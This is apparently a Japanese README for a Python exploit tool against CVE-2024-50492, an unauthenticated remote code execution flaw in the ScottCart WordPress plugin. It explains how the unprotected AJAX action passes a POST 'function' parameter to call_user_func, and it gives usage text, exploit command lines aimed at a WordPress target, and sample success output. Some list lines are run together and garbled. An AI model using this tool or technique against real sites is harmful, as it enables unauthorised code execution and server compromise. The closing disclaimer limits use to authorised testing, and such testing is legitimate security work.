
ScottCart <= 1.1 - 未認証のリモートコード実行
🔥 ScottCart <= 1.1 用エクスプロイトスクリプト - 未認証のリモートコード実行
🧑💻 By Nxploit – Khaled Alenazi
WordPress 用プラグイン ScottCart(バージョン ≤ 1.1)には、リモートコード実行(RCE) の脆弱性があります。
これにより、未認証の攻撃者 が脆弱な AJAX エンドポイントを介してサーバー上で任意の PHP 関数を実行できます。
このプラグインは、保護されていない AJAX アクションを登録します:
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
次のコードを実行します:
call_user_func($_POST['function']);
攻撃者は、既存の任意の PHP 関数 を呼び出すことができます。例:
phpinfo()scottcart_get_the_user_ip()system() ← 変更された環境で拡張されている場合phpinfo()results_2025-03-26_14-33-01.txt)User-Agent、エラーハンドリング、SSL 無視usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
options:
-h, --help Show this help message and exit
-u URL, --url URL Target base URL (e.g., http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Function to call (default: phpinfo)
phpinfo() による PoC):python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
📁 そして、以下に保存されます: results_2025-03-26_14-33-01.txt
このツールは、教育および許可されたテスト の目的にのみ使用してください。
所有していない、またはテストする明示的な許可を得ていないシステムに対しては使用しないでください。